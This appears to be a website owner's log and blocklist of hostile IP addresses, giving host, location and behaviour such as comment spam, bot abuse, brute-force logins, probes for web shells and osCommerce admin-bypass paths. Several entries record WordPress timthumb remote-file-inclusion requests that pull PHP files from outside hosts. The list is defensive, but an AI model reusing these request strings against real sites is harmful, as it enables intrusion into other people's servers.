184.168.152.72 Hostname: p3nlhg649.shr.prod.phx3.secureserver.net
Company: United States – Fort Worth Godaddy.com Llc
Looking for WSO2 Framework files:
/wp-content/wso2.php
plugins/wso.php
/57.php
/test2.php
91.219.237.126 see next Hostname: none.0.azar-a.net
Company: Hungary – Budapest Azar-a Kft.
Comment Spammer
91.219.236.0 – 91.219.239.255 Company: Hungary – Budapest Azar-a Kft. Restricted Region: Hungary
173.208.239.114 Company: United States – Boston Wholesale Internet Inc. Repeated activity blocked by firewall
199.48.254.21 Hostname: server.murrisinc.com
Company: United States – Franklin Private Customer
Website server IP: website – weblinkcapital.com
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Shopo/themify/img_x.php?src=http %3A%2F%2Fflickr.
com.ragepk.com%2Fbad.php
54.234.67.55 Hostname: ec2-54-234-67-55.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Unwanted bot: CCBot/2.0
173.201.196.176 Hostname: p3nlhg343.shr.prod.phx3.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Looking for WSO2 Framework files:
/wp-content/wso2.php
/files/wso2.php
/plugins/wso.php
192.95.12.175 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
195.225.168.119 Hostname: ru000348.widhost.net
Company: Italy – Roma Widestore S.r.l.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
88.208.204.206 Hostname: ps-uk-fh-01.dvmns.com
Company: United Kingdom Gloucester Fast Hosts Ltd
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Over?src=http: //picasa.com.amandas-designs.com/
eva.php
Looking for WordPress xmlrpc.php
198.148.119.236 Hostname: 236-119-148-198-dedicated.multacom.com
Company: United States – Los Angeles Multacom Corporation
Website server IP: Junk website – yuan0217.com
Comment Spammer
91.186.20.11 Hostname: dns1.supremecenter10.co.uk
Company: United Kingdom – Maidenhead Simply Transit Ltd
Website server IP: website – supremecenter10.co.uk
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/eStore/timthumb.php?src=http %3A%2F%2Fflickr.com.
antoniobosano.com%2Fdian.php
85.119.154.41 Hostname: alpha.tdbgraphics.ch
Company: Germany – Platz Virtual Private Servers
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
54.251.150.193 Hostname: ec2-54-251-150-193.ap-southeast-1.compute.amazonaws.com
Company: Singapore – Singapore Amazon.com Inc.
Comment Spammer
192.157.250.34 Hostname: 34.250-157-192.rdns.scalabledns.com
Company: United States – Chicago Enzu Inc
Comment Spammer
Bad host: Chicago Enzu Inc
95.154.195.163 Company: United Kingdom – Maidenhead Iomart Hosting Limited Comment Spammer
Tried to register on restricted site
184.105.235.237
184.105.235.234
Company: United States – Louisville Hurricane Electric Inc. Tried to register on restricted site
Bad host: Louisville Hurricane Electric Inc.
91.237.249.32 see next Company: Russian Federation – Moscow Telecom Tekhpodderzhka Ltd Comment Spammer
91.237.249.0 – 91.237.249.255 Company: Russian Federation – Moscow Telecom Tekhpodderzhka Ltd Banned Region: Russian Federation
151.237.177.16 Company: Netherlands – Deepak Mehta Fie Tried to register on restricted site
Bad host
92.53.96.72 see next Hostname: atlant.timeweb.ru
Company: Russian Federation – Saint Petersburg Ooo Lira-s
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
92.53.96.0 – 92.53.96.255 Company: Russian Federation – Saint Petersburg Ooo Lira-s Banned Region: Russian Federation
37.14.159.7 Hostname: 7.159.14.37.dynamic.jazztel.es
Company: Spain – Madrid Jazz Telecom S.a.
Using extremely long requests in excess of 255 characters
198.57.165.130 Hostname: mak.makemoneywhileyousleep-residualincome.com
Company: United States – Hilliard Unified Layer
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.74.246.68 Company: United States – San Jose Jack Lee
PEG TECH INC
Comment Spammer
198.27.76.111 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
37.59.162.238 Company: France – Roubaix Ovh Systems Comment Spammer
92.86.143.176 Hostname: adsl92-86-143-176.romtelecom.net
Company: Romania – Bucharest Romtelecom S.a.
Linking to CSS files
92.80.0.0 – 92.87.255.255 Company: Romania – Bucharest Romtelecom S.a. Restricted Region: Romania
92.83.49.160 see next Company: Romania – Targu-mures Romtelecom S.a. Tried to register on restricted site (bot)
92.83.48.0 – 92.83.55.255 Company: Romania – Targu-mures Romtelecom S.a. Restricted Region: Romania
184.107.251.74 Hostname: server-10.lorini.net
Company: Canada – Montreal Iweb Technologies Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
94.23.55.217 Hostname: ks301862.kimsufi.com
Company: France – Roubaix Ovh Systems
Comment Spammer
tried to register on restricted site
82.166.80.231 Hostname: 82-166-80-231.barak-online.net
Company: Israel – Tel Aviv Barak
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Aggregate/timthumb.php?src=
http: //flickr.com.drpier-albrecht.com/cpx.php
93.115.3.99 Company: Romania – Galati Fullshop Srl
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
wp-content/themes/dg-latest/thumb.php?src=http: //flickr.com.arvyshop.nl/nopart.php
93.115.0.0 – 93.115.3.255 Company: Romania – Galati Fullshop Srl Bad Host
Restricted Region: Romania
5.135.165.126 Hostname: ks301862.kimsufi.com
Company: France – Roubaix Ovh Systems
Website server IP: Junk website – manuali-vdo.pp.ua
DOS attack
This attacker returns regularly hitting a single page hundreds of times
Using referrers:
http: //aoki.moyblog.net/
http: //ukoka.moyblog.net/
http: //odki.moyblog.net/
http: //aliin.moyblog.net/
http: //pilikan.moyblog.net/
130.185.156.168 Company: United States – Newfane Deepak Mehta Fie Comment Spammer
tried to login and create content
37.220.15.146 see next Hostname: h37-220-15-146.host.redstation.co.uk
Company: United Kingdom – Gosport Redstation Limited
Comment Spammer / Trackback Spammer
37.220.15.128 – 37.220.15.191 Company: United Kingdom – Gosport Redstation Limited Bad Host: Redstation Limited
64.31.40.114 Hostname: 114-40-31-64.static.reverse.lstn.net
Company: United States – Dallas Limestone Networks Inc.
Comment Spammer / Trackback Spammer
36.248.161.155 see next Company: China – Putian Putian City Fujian Provincial Network Of Unicom Tried to register on restricted site (bot)
//register.aspx?agree=yes
/index.asp?T=reg
/account/register.php
/logging.php?action=login
/member.php?action=login&mod=logging
/member.php?mod=register
/register.aspx/register.aspx
/registration_rules.asp?FID=0
/reg.asp?reg=reg
36.248.160.0 – 36.248.191.255 Company: China – Putian Putian City Fujian Provincial Network Of Unicom Banned Region: China
37.140.192.89 see next Hostname: server54.hosting.reg.ru
Company: Russian Federation – Moscow Reg.ru Hosting
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/&sa=U&ei=c3yXUYmuC8TeOtO3geAG&ved=0CK0CEBYwWA&usg=
AFQjCNFwsoj2lSyd5OmSkcEF-ztN42-teQ/admin/file_manager.php/login.php
/&sa=U&ei=MgaYUbvlLtSQhQfHpoDIDQ&ved=0CEkQFjAQ&usg=
AFQjCNE1dbS51ULgpKxNIr6Lp0ozIxnrsA/admin/banner_manager.php/login.php
/&sa=U&ei=NAaYUdTdCI2YhQem84CADA&ved=0CCoQFjAGOAo&usg=
AFQjCNHwm19MaA6endfEU719TAJO2bA3Cw/admin/banner_manager.php/login.php
37.140.192.0 – 37.140.195.255 Company: Russian Federation – Moscow Reg.ru Hosting Banned Region: Russian Federation
208.68.36.184 Company: United States – New York City Digital Ocean Inc.
Website server IP: mmpictures.de
Comment Spammer
Found Honeypot trap file
46.21.147.205 Hostname: 205.147.21.46.inferno.name
Company: United States – Chicago Eureka Solutions Sp. Z O.o.
Shared hosting server IP
Spam Harvester
Tried to login/register on restricted site
91.121.165.200 see next Hostname: ks301862.kimsufi.com
Company: France – Paris Ovh Systems
Website server IP: Junk website – manuali-vdo.pp.ua
Remote File Inclusion attempt / WordPress timthumb & uploadify RFI exploit
/theme/default/js/uploadify/uploadify.php
/wp-includes/wp-script.php
/thumb_editor.php
91.121.10.11 see next Hostname: ns23219.ovh.net
Company: France – Paris Ovh Systems
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/slider-pro/includes/timthumb/timthumb.php?src=http:
//wordpress.company.myelectronics.by/wp-login.php
91.121.160.0 – 91.121.191.255 Company: France – Paris Ovh Systems Bad Host: Paris Ovh Systems
108.166.79.24 Hostname: 108-166-79-24.static.cloud-ips.com
Company: United States – San Antonio Slicehost
Shared hosting server IP
Image hotlinker
88.190.37.12 Hostname: sd-35270.dedibox.fr
Company: France – Nantes Free Sas
Comment Spammer
204.14.79.194 Company: United States – Tea Areti Internet Llc Comment Spammer
91.207.7.134 see next Hostname: 134.7.207.91.unknown.SteepHost.Net
Company: Ukraine – Kharkiv Pp Andrey Kiselev
Comment Spammer
91.207.4.0 – 91.207.9.255 Company: Ukraine – Kharkiv Pp Andrey Kiselev Banned region: Ukraine
41.249.3.27 see next Company: Morocco – Rabat Office National Des Postes Et Telecommunications Onpt (maroc Telecom)/iam Mail server
41.249.0.0 – 41.249.255.255 Company: Morocco – Rabat Office National Des Postes Et Telecommunications Onpt (maroc Telecom)/iam Bad host
142.4.100.164 Company: United States – San Jose Fengchen Comment Spammer
Another PEG TECH INC bad IP
94.23.236.99 Hostname: ks308255.kimsufi.com
Company: France – Roubaix Ovh Systems
Website server IP: waza.fr
Comment Spammer
185.25.48.2 Company: Lithuania – Informacines sistemos ir technologijos, UAB Comment Spammer
204.14.79.203 Company: United States – Tea Areti Internet Llc Comment Spammer
198.2.204.77 Company: United States – PEG TECH INC bad IP Comment Spammer
Another PEG TECH INC bad IP
74.208.46.132 Hostname: u16851550.onlinehome-server.com
Company: United States – Wayne 1&1 Internet Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
95.42.67.174 Hostname: u16851550.onlinehome-server.com
Company: Bulgaria – Sofia Bulgarian Telecommunications Company Plc.
Trying to hotlink to stylesheet
172.245.16.110 Hostname: host.colocrossing.com
Company: ColoCrossing
Tried to register on restricted site (bot)
Incomplete Domain records
62.212.85.119 Hostname: hosted-by.leaseweb.com
Company: Netherlands – Amsterdam Leaseweb B.v.
Website server IP – spam website: oakleyssunglassesfake.com
Tried to register on restricted site (bot)
72.55.168.153 Hostname: cl-t095-233cl.server3.fisgo.com.br
Company: Canada – Montreal Iweb Dedicated Cl
Tried to register on restricted site (bot)
198.46.148.194 Hostname: host.colocrossing.comt
Company: United States – Atlanta New Wave Netconnect Llc
Tried to register on restricted site (bot)
89.111.179.99 Hostname: cf22.hc.ru
Company: Russian Federation – Moscow Garant-park-telecom Ltd.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
81.156.80.239 Hostname: host81-156-80-239.range81-156.btcentralplus.com
Company: United Kingdom – Sheffield Bt Public Internet Service
Tried to register on restricted site (bot)
/signup.php
/tiki-register.php
/wikka.php?wakka=UserSettings
/join.php
/register.php
/login.php
199.180.116.210 Company: United States – Scranton Upvps Hosting Comment Spammer
91.236.75.21 Company: Poland – Piekoszow Przedsiebiorstwo Uslug Specjalistycznych Elan Mgr Inz. Andrzej Niechcial Comment Spammer
93.182.157.8 see next Hostname: anon-157-8.relakks.com
Company: Sweden – Lund Viaeuropa I Lund Ab
Comment Spammer
94.23.55.217 Hostname: ks305471.kimsufi.com
Company: France – Roubaix Ovh Systems
Comment Spammer
tried to register on restricted site
69.174.87.100 Hostname: 1453ob.scansafe.net
Company: United States – Bangor Scansafe Inc.
Looking for non-existent URLs with very long (in excess of 256 characters) strings
74.63.192.13 Hostname: 13-192-63-74.static.reverse.lstn.net
Company: United States – Dallas Limestone Networks Inc.
Comment Spammer / Trackback Spammer
198.200.36.152 Company: United States – Sunnyvale Peg Tech Inc Comment Spammer
83.6.178.2 Hostname: abao2.neoplus.adsl.tpnet.pl
Company: Poland – Warsaw Neostrada Plus
Comment Spammer
80.72.37.156 Hostname: host-156.etop.dev.pl
Company: Poland – Warsaw Neostrada Plus
Comment Spammer
198.56.241.43 Hostname: 43.241-56-198.rdns.scalabledns.com
Company: United States – Los Angeles Enzu Inc
Comment Spammer
50.115.171.231 Company: United States – Kansas City Virpus Networks Comment Spammer
108.163.194.162 Hostname: utility05.sitelock.com
Company: United States – Chicago Singlehop Inc.
Rule Breaker:
UA: SiteLockSpider [en] (WinNT; I ;Nav)
66.135.38.73 Hostname: s1.binarymatters.com
Company: United States – San Antonio Serverbeach
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.95.0.218 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
50.115.170.66 Company: United States – Kansas City Virpus Networks Comment Spammer
198.72.108.53 Company: Canada – Lasalle Iweb Dedicated Ne Comment Spammer
54.251.150.200 Hostname: ks3282742.kimsufi.com
Company: Singapore – Singapore Amazon.com Inc.
Comment Spammer
216.18.208.21 Hostname: smtp.kuwaitiarmy.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
198.2.193.100 Company: United States – PEG TECH INC Comment Spammer
37.59.223.250 Company: France – Roubaix Ovh Systems Trying to register
85.25.255.230 Hostname: triton835.startdedicated.com
Company: Germany – Hurth Intergenia Ag
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Quality/superior/scripts/timthumb.php?src=http
%3A%2F%2Fpicasa.com.umadescpjr4.com.br%2Fbad.php
91.121.220.43 Hostname: ks305471.kimsufi.com
Company: France – Roubaix Ovh Systems
Website hosting server IP
Tried to add content: /node/add
Banned Host
190.223.55.66 Company: Peru – Lima America Movil Peru S.a.c. Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
72.167.248.46 Hostname: ip-72-167-248-46.ip.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
185.5.98.243 Hostname: 185-5-98-243.greendata.pl
Company: Poland – Poznan Biznes-host.pl Sp. Z O.o.
Comment Spammer
91.121.27.38 Hostname: ns25033.ovh.net
Company: France – Roubaix Ovh Systems
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/search/thumb.php?src=http: //img.youtube.com.
parsau.cl/youtube.php
/wp-content/themes/Magazine/thumb.php?src=http: //img.youtube.
communication.adrianaraya.cr/wp-login.php
151.237.191.176 Company: United States – Asheville Deepak Mehta Fie Attempting to add content:
[DOMAIN]/node/add
Comment Spammer
192.74.234.76 Company: United States – San Jose Xs Comment Spammer
192.151.145.29 Company: United States – Kansas City Zhou Pizhong WordPress trackback spammer
192.157.250.2 Hostname: 2.250-157-192.rdns.scalabledns.com
Company: United States – Chicago Enzu Inc
Comment Spammer
142.0.129.125 Company: United States – San Jose Peg Tech Inc Comment Spammer
Another PEG TECH INC bad IP
192.80.186.243 Company: United States – Chicago Enzu Inc Comment Spammer
198.2.193.100 Company: United States – Peg Tech Inc Comment Spammer
198.56.241.42 Hostname: 42.241-56-198.rdns.scalabledns.com
Company: United States – Chicago Enzu Inc
Comment Spammer
194.66.232.88 Hostname: crawler02.bl.uk
Company: United Kingdom – London British Library
Rule breaker: ignores robots.txt
User Agent: bl.uk_lddc_bot/3.1.1 (+http: //www.bl.uk/aboutus/legaldeposit/websites
/websites/faqswebmaster/index.html)
157.7.138.136
157.7.138.140
157.7.138.142
Pro-active Ban: 157.7.138.0 – 157.7.138.255
Company: Japan – Tokyo Gmo Internet Inc. Malicious user agent: Python-urllib/2.6
100.42.213.61 Hostname: 100-42-213-61.static.webnx.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
Tried to register
216.18.208.45 Hostname: ns1.thelawofcontract.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
199.204.45.203 Hostname: node-1jfq023.cloud9.ymq1.ca.layeredge.net
Company: Canada – Montreal Vexxhost
Comment Spammer
37.59.76.161 Company: France – Roubaix Ovh Systems WordPress trackback spammer
76.72.173.229 Company: United States – Philadelphia Database By Design Llc Comment Spammer
216.224.179.80
Hostname: vps-1094534-8977.manage.myhosting.comt
Company: United States – Boxborough Softcom America Inc.
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/LightBright/timthumb.php?src=http %3A%2F%2Fpicasa.com.maygunn.no%2Fbad.php
173.193.219.168 Hostname: 173.193.219.168-static.reverse.softlayer.com
Company: United States – Dallas Hosting Services Inc.
Rule breaker / bad bot.
Aboundex/0.2 (http: //www.aboundex.com/crawler/)
Aboundex/0.3 (http: //www.aboundex.com/crawler/)
142.0.128.233 Company: United States – San Jose Jiusutechnology Limited Liability Company
Website hosting server IP:
Comment Spammer
Another PEG TECH INC bad IP
193.107.17.36 Company: Seychelles – Victoria Ideal Solution Ltd
Website hosting server IP:
Trying to login to WordPress with numerous URLs ending /wp-login.php
208.66.59.2 Hostname: mail.bluecliffhosting.com
Company: United States – San Diego Comentum Corp.
Website hosting server IP:
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/modularity/includes/timthumb.php?src=http %3A%2F%2F
picasa.com.awisshipping.com%2Fcache.php
174.136.0.213 Hostname: aileec.com
Company: United States – Dallas Colo4 Llc
Website hosting server IP:
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
66.128.53.125 Hostname: host5.dnns.net
Company: United States – Casper Global Ip Networks Inc
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/widescreen/includes/timthumb.php?src=http %3A%2F%2
Fflickr.com.tr.realityinformatica.com%2Fbad.php
198.27.78.206 Company: United States – Newark Ovh Comment Spammer
184.105.235.40 Hostname: blue.oxiascripts.com
Company: United States – Louisville Hurricane Electric Inc.
Comment Spammer
184.7.91.2 Hostname: fl-184-7-91-2.dhcp.embarqhsd.net
Company: United States – Avon Park Embarq Corporation
Comment Spammer
192.74.234.76 Company: United States – San Jose Xs Comment Spammer
Another PEG TECH INC bad IP
50.63.66.91 Hostname: ip-50-63-66-91.ip.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Website hosting server IP:
URL/%22%20onmousedown=%22return%20rwt(this,'','','','186','
AFQjCNGnAXwbVSGzHLGCP7havL4Jp2ym8A','','0CMgHEBYwVThk','','',event)%22%3EDon&
and multiple similar requests
37.59.225.38 Company: United States – Roubaix Ovh Systems WordPress trackback spammer
201.249.17.113 Hostname: 201-249-17-113.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
WordPress trackback spammer
69.197.189.4 Company: United States – Kansas City Wholesale Internet Inc Multiple attempts to find login/registration forms with various common URLs
198.204.226.146 Company: United States – Kansas City Zhou Pizhong Multiple attempts to find login/registration forms with various common URLs
72.54.93.181 Company: United States – Fort Worth Cbeyond Communications Llc Brute Force dictionary attack:
/user/login/index.php
Using user names “admin” and “administrator”
50.31.96.11 Hostname: ip11.50-31-96.static.steadfastdns.net
Company: United States – Chicago Steadfast Network
Rule breaker:
Banned User Agents (bots):
ip-web-crawler.com
intelium_bot
62.149.230.50 Hostname: host50-230-149-62.serverdedicati.aruba.it
Company: Italy – Arezzo Aruba S.p.a.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/&sa=U&ei=1laCUZfRCIiO7Qbc0YDwAg&ved=0CFAQFjAQOJAD&usg=
AFQjCNGN5BPB8A8wr6VtuMAqfzK7A1O8WQ/admin/categories.php/login.php
/&sa=U&ei=xVaCUZuMHs-Kswah6oHABg&ved=0CJkBEBYwLw&usg=
AFQjCNEdYGzoa9wfjPGd5xnjyqWiJ_Q-qw/admin/categories.php/login.php
74.111.23.38 Hostname: pool-74-111-23-38.syrcny.fios.verizon.net
Company: United States – Syracuse Verizon Online Llc
Bad bot: MJ12bot – Rule breaker
User agent: Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
141.8.195.20 Hostname: njerd.from.sh
Company: Russian Federation – Saint Petersburg Sprinthost.ru Llc
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
216.18.208.53 Hostname: www .mrsathawaii.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
100.42.213.2 Hostname: 100-42-213-2.static.webnx.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
209.73.151.217 Company: United States – San Jose Detectnetwork.us Comment Spammer
195.24.65.50 Hostname: web5.r01.ru
Company: Russian Federation – Moscow Garant-park-telecom Ltd
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/&sa=U&ei=P3aDUdzNHpGS7AbagYGQBw&ved=0CJABEBYwJQ&usg=
AFQjCNFbJA-XgsEv5cJgwNcGspDlcl_SKA/admin/file_manager.php/login.php
/&sa=U&ei=P3aDUe7zFeuk4ASn6YDADg&ved=0CL4BEBYwOA&usg=
AFQjCNG8Soj1uAiSG1koQwYefikWj07gYA/admin/categories.php/login.php
198.154.213.180 Hostname: dor.doralprint.com
Company: United States – Houston Websitewelcome.com
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/headlines/thumb.php?src=http%3A%2F%2F
propanepressure.com%2Fwp-includes%2Finclude%2Fbad.php
72.167.40.189 Hostname: ip-72-167-40-189.ip.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
74.221.215.241 Company: United States – Seattle Dme Hosting Llc Trying to login to site with username: eugeniowh / trisha28m
Trying to add content: /node/add
142.4.209.47 Hostname: ks4003193.ip-142-4-209.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
Ovh Hosting Inc. again
37.59.251.141 Company: France – Roubaix Ovh Systems Comment Spammer
Banned host: Roubaix Ovh Systems
70.38.52.2 Company: Canada – Montreal Afoi Koutsantoni E.e
Shared hosting server IP
Known Mail server & Dictionary Attacker.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
64.131.83.138 Hostname: server.bidstart.com
Company: United States – Greenwich Gary Posner Inc
Website hosting server IP: bidsstart DOT com and similar rubbish websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
168.63.82.21 Company: Ireland – Dublin Microsoft Corp Comment Spammer
69.31.101.8 Company: United States – Torrance Giglinx Inc. Comment Spammer
Bad host: Torrance Giglinx Inc.
37.203.215.107 Company: Sweden – Stockholm Deepak Mehta Fie Trying to register account on restricted site
Bad Host: Deepak Mehta Fie
184.107.167.2 Company: Canada – Montreal Soluciones Empresariales
Shared hosting server IP
Mail Server
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
URL:&sa=U&ei=mLR1UaCyIsvp0QGaiIFw&ved=0CFsQFjAS&usg=
AFQjCNGW6nmtYoh6ptV1E3jff0ksWDn8UQ/admin/banner_manager.php/login.php
174.122.127.34 Hostname: celsior.websitewelcome.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP
Trawling for non-existent URLs
blog/cookie_usage.php
blog/contact_us.php
blog/images/pixel_trans.gif
blog/shopping_cart.php
blog/product_info.php
As well as other page URLs with same /ending as above
69.49.99.104 Hostname: web104c10.megawebservers.com
Company: United States – Great Lakes Internetnamesforbusiness.com
Trying to access non-existent xmlrpc.php
192.95.30.78 Hostname: celsior.websitewelcome.com
Company: Canada – Montreal Ovh Hosting Inc.
Trackback spammer
Seen without valid User Agent.
It’s interesting how often OVH / OVH Systems IPs are seen with bad activity
37.59.151.181 Company: France – Roubaix Ovh Systems Comment Spammer
69.49.99.105 Hostname: admin.thelawofcontract.com
Company: United States – Great Lakes Internetnamesforbusiness.com
Trying to access {URL}/xmlrpc.php
Malicious user agent: libwww-perl/5.835
199.180.131.214 Company: United States – Lawrence Dnsslave.com Comment Spammer
216.18.208.50 Hostname: vps-1099979-10086.manage.myhosting.com
Company: United States – Los Angeles Webnx
Shared hosting server IP
Comment Spammer
192.74.237.57 Company: United States – San Jose Xs Comment Spammer
Bad Host: San Jose Xs – PEG TECH INC
37.72.190.174 Company: United States – Carolina Deepak Mehta Fie Comment Spammer
74.63.192.11
74.63.192.12
Hostname: 12-192-63-74.static.reverse.lstn.net
Company: United States – Dallas Limestone Networks Inc.
Comment Spammer
208.115.125.60 Hostname: sea.xpresservers.com
Company: Pakistan – Okara Private Customer
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/StartWPA/timthumb.php?src=http
%3A%2F%2Fimg.youtube.com.vitryroller.com%2Frahma.php
193.173.27.200 Hostname: www. nl.worldhosting.org
Company: Netherlands – Heemskerk Worldhosting.org Bv
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.200.37.193 Company: United States – Sunnyvale Peg Tech Inc Comment Spammer
Bad Host: – PEG TECH INC
67.55.32.100 Hostname: ssd2-n14.canaca.com
Company: Canada – Mississauga Canaca-com Inc.
website server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.154.251.92 Hostname: server.timmsmedia.com
Company: United States – Houston Websitewelcome. com
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
&sa=U&ei=k9B5UavtL4aP7AbspoGACw&ved=0CGEQFjAX&usg=
AFQjCNFmsEtsCfEr_NKwE1GSVbg4Kaideg/admin/file_manager.php/login.php
/&sa=U&ei=k9B5UZvpKMivPJK1gZAK&ved=0CGEQFjAX&usg=
AFQjCNFmB0_MkB4CjFfmflnTDPoH1h7Djg/admin/categories.php/login.php
Faked User Agent
Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
server.timmsmedia.com is not a Googlebot domain/hostname.
157.56.93.51 Bingbot Rule breaker: ignores robots.txt
216.224.176.234 Hostname: vps-1099979-10086.manage.myhosting.com
Company: United States – Jamaica Plain Softcom America Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
151.237.189.235 Company: Sweden – Stockholm Deepak Mehta Fie Trying to register on restricted site
69.49.99.104 Hostname: web104c10.megawebservers.com
Company: United States – Great Lakes Internetnamesforbusiness.com
Trying to access {URL}/xmlrpc.php
Malicious User Agent: libwww-perl/5.835
69.49.99.102 Hostname: web104c10.megawebservers.com
Company: United States – Great Lakes Internetnamesforbusiness.com
Trying to access {DOMAIN}//xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php
{URL}//xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php
Malicious User Agent: libwww-perl/5.835
72.29.72.173 Hostname: 72-29-72-173.static.dimenoc.com
Company: United States – Orlando Hostdime.com Inc.
Shared hosting server IP
Multiple attempts at wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
URL&sa=U&ei=aiN0UcXRIoOQ8wTk_YGwDQ&ved=0CG8QFjAoOD0&usg=AFQjCNFTzyuLBYFyrqYM4EAuyReUw63fGQ/admin/file_manager.php/login.php
